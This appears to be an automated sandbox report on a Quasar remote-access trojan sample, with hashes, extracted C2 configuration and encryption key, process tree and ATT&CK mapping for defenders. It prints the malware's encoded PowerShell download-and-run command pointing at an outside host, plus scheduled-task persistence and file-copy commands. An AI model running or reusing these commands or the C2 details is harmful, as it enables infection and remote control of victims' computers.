quasar | 31216d4c09b0bfa5deba86b4dd6206a2ba7a6f35ecb82cd81015ec51ceefa3b6

General

Target

Venom.exe
Size

4KB
MD5

a26e4919eb47e0c23e8c38da0f3488db
SHA1

43ffb3c3a21c8ae376380fb6d419f46391f2f595
SHA256

31216d4c09b0bfa5deba86b4dd6206a2ba7a6f35ecb82cd81015ec51ceefa3b6
SHA512

3f8b07aca6d77c41a29576bd4bb9ca190edf6fbf0775f7d8db1cf86230d863f9b458cc4fad9a94d252354f99a59c779f0acf30bb417d5abb7bd4eab6ac95291e
SSDEEP

96:xjd8wOXOT7ZTKfAcQZ8o7+S7+w/8d3ojSrl:RuwOXOTFKfOh1/8dR

Score

10^/10

quasar office04 spyware trojan

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

C2

93.123.85.108:4782

Mutex

e14b8f59-979b-4ebf-8602-dd3c4d6c301e

Attributes

encryption_key
534734397C0FA9A1D28F061AD75DF4100BFF5787
install_name
Msconfig.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Quasar Client Startup
subdirectory
SubDir

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 10 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1984-14-0x00000000007D0000-0x0000000000AF4000-memory.dmp	family_quasar
behavioral1/memory/1984-27-0x00000000007D0000-0x0000000000AF4000-memory.dmp	family_quasar
behavioral1/memory/1984-26-0x00000000007D0000-0x0000000000AF4000-memory.dmp	family_quasar
behavioral1/memory/1984-20-0x00000000007D0000-0x0000000000AF4000-memory.dmp	family_quasar
behavioral1/memory/1984-16-0x00000000007D0000-0x0000000000AF4000-memory.dmp	family_quasar
behavioral1/memory/2276-49-0x0000000000400000-0x0000000000724000-memory.dmp	family_quasar
behavioral1/memory/2276-50-0x0000000000400000-0x0000000000724000-memory.dmp	family_quasar
behavioral1/memory/2276-51-0x0000000000400000-0x0000000000724000-memory.dmp	family_quasar
behavioral1/memory/2852-72-0x0000000000400000-0x0000000000724000-memory.dmp	family_quasar
behavioral1/memory/2852-71-0x0000000000400000-0x0000000000724000-memory.dmp	family_quasar

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

3 3040 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 6 IoCs

Processes:

Encrypted.exeMsconfig.exemsconfig.exeMsconfig.exemsconfig.exeMsconfig.exe

pid process

2856 Encrypted.exe
2384 Msconfig.exe
1164 msconfig.exe
2512 Msconfig.exe
1304 msconfig.exe
1728 Msconfig.exe
Loads dropped DLL 4 IoCs

Processes:

powershell.exevbc.exevbc.exevbc.exe

pid process

3040 powershell.exe
1984 vbc.exe
2276 vbc.exe
2852 vbc.exe
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

flow	pid	process
3	3040	powershell.exe

pid	process
2856	Encrypted.exe
2384	Msconfig.exe
1164	msconfig.exe
2512	Msconfig.exe
1304	msconfig.exe
1728	Msconfig.exe

pid	process
3040	powershell.exe
1984	vbc.exe
2276	vbc.exe
2852	vbc.exe

Drops file in System32 directory 9 IoCs

Processes:

vbc.exevbc.exevbc.exe

description	ioc	process
File created	C:\Windows\SysWOW64\SubDir\Msconfig.exe	vbc.exe
File opened for modification	C:\Windows\SysWOW64\SubDir\Msconfig.exe	vbc.exe
File opened for modification	C:\Windows\SysWOW64\SubDir	vbc.exe
File created	C:\Windows\SysWOW64\SubDir\Msconfig.exe	vbc.exe
File opened for modification	C:\Windows\SysWOW64\SubDir	vbc.exe
File opened for modification	C:\Windows\SysWOW64\SubDir	vbc.exe
File opened for modification	C:\Windows\SysWOW64\SubDir\Msconfig.exe	vbc.exe
File created	C:\Windows\SysWOW64\SubDir\Msconfig.exe	vbc.exe
File opened for modification	C:\Windows\SysWOW64\SubDir\Msconfig.exe	vbc.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

Encrypted.exemsconfig.exemsconfig.exe

description	pid	process	target process
PID 2856 set thread context of 1984	2856	Encrypted.exe	vbc.exe
PID 1164 set thread context of 2276	1164	msconfig.exe	vbc.exe
PID 1304 set thread context of 2852	1304	msconfig.exe	vbc.exe

Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid process

1492 schtasks.exe
1408 schtasks.exe
2992 schtasks.exe
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exe

pid process

3040 powershell.exe
3040 powershell.exe
3040 powershell.exe

pid	process
1492	schtasks.exe
1408	schtasks.exe
2992	schtasks.exe

pid	process
3040	powershell.exe
3040	powershell.exe
3040	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.exevbc.exevbc.exevbc.exe

description	pid	process
Token: SeDebugPrivilege	3040	powershell.exe
Token: SeDebugPrivilege	1984	vbc.exe
Token: SeDebugPrivilege	2276	vbc.exe
Token: SeDebugPrivilege	2852	vbc.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Venom.exepowershell.exeEncrypted.execmd.exevbc.exetaskeng.exemsconfig.execmd.exe

description	pid	process	target process
PID 2656 wrote to memory of 3040	2656	Venom.exe	powershell.exe
PID 2656 wrote to memory of 3040	2656	Venom.exe	powershell.exe
PID 2656 wrote to memory of 3040	2656	Venom.exe	powershell.exe
PID 2656 wrote to memory of 3040	2656	Venom.exe	powershell.exe
PID 3040 wrote to memory of 2856	3040	powershell.exe	Encrypted.exe
PID 3040 wrote to memory of 2856	3040	powershell.exe	Encrypted.exe
PID 3040 wrote to memory of 2856	3040	powershell.exe	Encrypted.exe
PID 3040 wrote to memory of 2856	3040	powershell.exe	Encrypted.exe
PID 2856 wrote to memory of 1984	2856	Encrypted.exe	vbc.exe
PID 2856 wrote to memory of 1984	2856	Encrypted.exe	vbc.exe
PID 2856 wrote to memory of 1984	2856	Encrypted.exe	vbc.exe
PID 2856 wrote to memory of 1984	2856	Encrypted.exe	vbc.exe
PID 2856 wrote to memory of 1984	2856	Encrypted.exe	vbc.exe
PID 2856 wrote to memory of 1984	2856	Encrypted.exe	vbc.exe
PID 2856 wrote to memory of 1984	2856	Encrypted.exe	vbc.exe
PID 2856 wrote to memory of 1984	2856	Encrypted.exe	vbc.exe
PID 2856 wrote to memory of 1984	2856	Encrypted.exe	vbc.exe
PID 2856 wrote to memory of 2824	2856	Encrypted.exe	cmd.exe
PID 2856 wrote to memory of 2824	2856	Encrypted.exe	cmd.exe
PID 2856 wrote to memory of 2824	2856	Encrypted.exe	cmd.exe
PID 2856 wrote to memory of 2824	2856	Encrypted.exe	cmd.exe
PID 2856 wrote to memory of 2812	2856	Encrypted.exe	cmd.exe
PID 2856 wrote to memory of 2812	2856	Encrypted.exe	cmd.exe
PID 2856 wrote to memory of 2812	2856	Encrypted.exe	cmd.exe
PID 2856 wrote to memory of 2812	2856	Encrypted.exe	cmd.exe
PID 2812 wrote to memory of 1492	2812	cmd.exe	schtasks.exe
PID 2812 wrote to memory of 1492	2812	cmd.exe	schtasks.exe
PID 2812 wrote to memory of 1492	2812	cmd.exe	schtasks.exe
PID 2812 wrote to memory of 1492	2812	cmd.exe	schtasks.exe
PID 2856 wrote to memory of 2928	2856	Encrypted.exe	cmd.exe
PID 2856 wrote to memory of 2928	2856	Encrypted.exe	cmd.exe
PID 2856 wrote to memory of 2928	2856	Encrypted.exe	cmd.exe
PID 2856 wrote to memory of 2928	2856	Encrypted.exe	cmd.exe
PID 1984 wrote to memory of 2384	1984	vbc.exe	Msconfig.exe
PID 1984 wrote to memory of 2384	1984	vbc.exe	Msconfig.exe
PID 1984 wrote to memory of 2384	1984	vbc.exe	Msconfig.exe
PID 1984 wrote to memory of 2384	1984	vbc.exe	Msconfig.exe
PID 1272 wrote to memory of 1164	1272	taskeng.exe	msconfig.exe
PID 1272 wrote to memory of 1164	1272	taskeng.exe	msconfig.exe
PID 1272 wrote to memory of 1164	1272	taskeng.exe	msconfig.exe
PID 1272 wrote to memory of 1164	1272	taskeng.exe	msconfig.exe
PID 1164 wrote to memory of 2276	1164	msconfig.exe	vbc.exe
PID 1164 wrote to memory of 2276	1164	msconfig.exe	vbc.exe
PID 1164 wrote to memory of 2276	1164	msconfig.exe	vbc.exe
PID 1164 wrote to memory of 2276	1164	msconfig.exe	vbc.exe
PID 1164 wrote to memory of 2276	1164	msconfig.exe	vbc.exe
PID 1164 wrote to memory of 2276	1164	msconfig.exe	vbc.exe
PID 1164 wrote to memory of 2276	1164	msconfig.exe	vbc.exe
PID 1164 wrote to memory of 2276	1164	msconfig.exe	vbc.exe
PID 1164 wrote to memory of 2276	1164	msconfig.exe	vbc.exe
PID 1164 wrote to memory of 756	1164	msconfig.exe	cmd.exe
PID 1164 wrote to memory of 756	1164	msconfig.exe	cmd.exe
PID 1164 wrote to memory of 756	1164	msconfig.exe	cmd.exe
PID 1164 wrote to memory of 756	1164	msconfig.exe	cmd.exe
PID 1164 wrote to memory of 576	1164	msconfig.exe	cmd.exe
PID 1164 wrote to memory of 576	1164	msconfig.exe	cmd.exe
PID 1164 wrote to memory of 576	1164	msconfig.exe	cmd.exe
PID 1164 wrote to memory of 576	1164	msconfig.exe	cmd.exe
PID 576 wrote to memory of 1408	576	cmd.exe	schtasks.exe
PID 576 wrote to memory of 1408	576	cmd.exe	schtasks.exe
PID 576 wrote to memory of 1408	576	cmd.exe	schtasks.exe
PID 576 wrote to memory of 1408	576	cmd.exe	schtasks.exe
PID 1164 wrote to memory of 2324	1164	msconfig.exe	cmd.exe
PID 1164 wrote to memory of 2324	1164	msconfig.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\Venom.exe
"C:\Users\Admin\AppData\Local\Temp\Venom.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2656

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwB3AG8AcgBrAHMAZQByAHYAZQByAC4AZABkAG4AcwAuAG4AZQB0AC8ARQBuAGMAcgB5AHAAdABlAGQALgBlAHgAZQAnACwAIAA8ACMAcABlAGIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBsAHgAYwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBmAHYAbQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBFAG4AYwByAHkAcAB0AGUAZAAuAGUAeABlACcAKQApADwAIwB3AGYAZAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBkAGwAegAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAYwBpAGkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcARQBuAGMAcgB5AHAAdABlAGQALgBlAHgAZQAnACkAPAAjAHkAcQB0ACMAPgA="
2⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3040

C:\Users\Admin\AppData\Local\Temp\Encrypted.exe
"C:\Users\Admin\AppData\Local\Temp\Encrypted.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2856

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
4⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1984

C:\Windows\SysWOW64\SubDir\Msconfig.exe
"C:\Windows\system32\SubDir\Msconfig.exe"
5⤵
- Executes dropped EXE
PID:2384

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C mkdir "C:\Users\Admin\AppData\Roaming\msconfig"
4⤵
PID:2824

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\msconfig\msconfig.exe'" /f
4⤵
- Suspicious use of WriteProcessMemory
PID:2812

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\msconfig\msconfig.exe'" /f
5⤵
- Creates scheduled task(s)
PID:1492

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C copy "C:\Users\Admin\AppData\Local\Temp\Encrypted.exe" "C:\Users\Admin\AppData\Roaming\msconfig\msconfig.exe"
4⤵
PID:2928

C:\Windows\system32\taskeng.exe
taskeng.exe {6F305B59-A46A-412F-A18D-6885B05C0AD4} S-1-5-21-481678230-3773327859-3495911762-1000:UIBNQNMA\Admin:Interactive:[1]
1⤵
- Suspicious use of WriteProcessMemory
PID:1272

C:\Users\Admin\AppData\Roaming\msconfig\msconfig.exe
C:\Users\Admin\AppData\Roaming\msconfig\msconfig.exe
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1164

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
3⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:2276

C:\Windows\SysWOW64\SubDir\Msconfig.exe
"C:\Windows\system32\SubDir\Msconfig.exe"
4⤵
- Executes dropped EXE
PID:2512

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C mkdir "C:\Users\Admin\AppData\Roaming\msconfig"
3⤵
PID:756

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\msconfig\msconfig.exe'" /f
3⤵
- Suspicious use of WriteProcessMemory
PID:576

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\msconfig\msconfig.exe'" /f
4⤵
- Creates scheduled task(s)
PID:1408

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C copy "C:\Users\Admin\AppData\Roaming\msconfig\msconfig.exe" "C:\Users\Admin\AppData\Roaming\msconfig\msconfig.exe"
3⤵
PID:2324

C:\Users\Admin\AppData\Roaming\msconfig\msconfig.exe
C:\Users\Admin\AppData\Roaming\msconfig\msconfig.exe
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1304

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
3⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:2852

C:\Windows\SysWOW64\SubDir\Msconfig.exe
"C:\Windows\system32\SubDir\Msconfig.exe"
4⤵
- Executes dropped EXE
PID:1728

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C mkdir "C:\Users\Admin\AppData\Roaming\msconfig"
3⤵
PID:1572

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\msconfig\msconfig.exe'" /f
3⤵
PID:2440

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\msconfig\msconfig.exe'" /f
4⤵
- Creates scheduled task(s)
PID:2992

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C copy "C:\Users\Admin\AppData\Roaming\msconfig\msconfig.exe" "C:\Users\Admin\AppData\Roaming\msconfig\msconfig.exe"
3⤵
PID:2160

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Scripting

1

T1064

Scheduled Task/Job

1

T1053

Persistence

Scheduled Task/Job

1

T1053

Privilege Escalation

Scheduled Task/Job

1

T1053

Defense Evasion

Scripting

1

T1064

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Encrypted.exe
Filesize
9.0MB

MD5
78c78748cab54dcf941633f5297c1bf6

SHA1
0c0ee5e0694315bc3813c95d8561056dd8831bee

SHA256
4b3430ba8a4388133716b3747f00e9a98c99f37631aac98a03ff6bc8b674cf1e

SHA512
d2212b83a7a4ca4d428cb200f45cc723f6f41485ffd7856f6eeba00f86996f584009e3f2fc5bb0230bfaa96e9c75ac08d3a0c56a07fa94b03b5b220e3e63458f

Download Submit
\??\PIPE\lsarpc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\Windows\SysWOW64\SubDir\Msconfig.exe
Filesize
2.6MB

MD5
1f7bccc57d21a4bfeddaafe514cfd74d

SHA1
4dab09179a12468cb1757cb7ca26e06d616b0a8d

SHA256
d4cb7377e8275ed47e499ab0d7ee47167829a5931ba41aa5790593595a7e1061

SHA512
9e639c777dc2d456f038c14efb7cbc871ceb1d7380a74d18fb722a28901357ccb1166c0d883562280e030f0252004ca13a1371ea480d0523c435cd0a6d9f43d8

Download Submit
memory/1164-39-0x0000000000020000-0x000000000034C000-memory.dmp

Filesize
3.2MB

Download
memory/1304-60-0x00000000000E0000-0x000000000040C000-memory.dmp

Filesize
3.2MB

Download
memory/1984-26-0x00000000007D0000-0x0000000000AF4000-memory.dmp

Filesize
3.1MB

Download
memory/1984-10-0x00000000007D0000-0x0000000000AF4000-memory.dmp

Filesize
3.1MB

Download
memory/1984-20-0x00000000007D0000-0x0000000000AF4000-memory.dmp

Filesize
3.1MB

Download
memory/1984-18-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

Filesize
4KB

Download
memory/1984-16-0x00000000007D0000-0x0000000000AF4000-memory.dmp

Filesize
3.1MB

Download
memory/1984-27-0x00000000007D0000-0x0000000000AF4000-memory.dmp

Filesize
3.1MB

Download
memory/1984-14-0x00000000007D0000-0x0000000000AF4000-memory.dmp

Filesize
3.1MB

Download
memory/1984-12-0x00000000007D0000-0x0000000000AF4000-memory.dmp

Filesize
3.1MB

Download
memory/2276-48-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

Filesize
4KB

Download
memory/2276-50-0x0000000000400000-0x0000000000724000-memory.dmp

Filesize
3.1MB

Download
memory/2276-51-0x0000000000400000-0x0000000000724000-memory.dmp

Filesize
3.1MB

Download
memory/2276-49-0x0000000000400000-0x0000000000724000-memory.dmp

Filesize
3.1MB

Download
memory/2852-72-0x0000000000400000-0x0000000000724000-memory.dmp

Filesize
3.1MB

Download
memory/2852-71-0x0000000000400000-0x0000000000724000-memory.dmp

Filesize
3.1MB

Download
memory/2856-9-0x0000000000390000-0x00000000006BC000-memory.dmp

Filesize
3.2MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads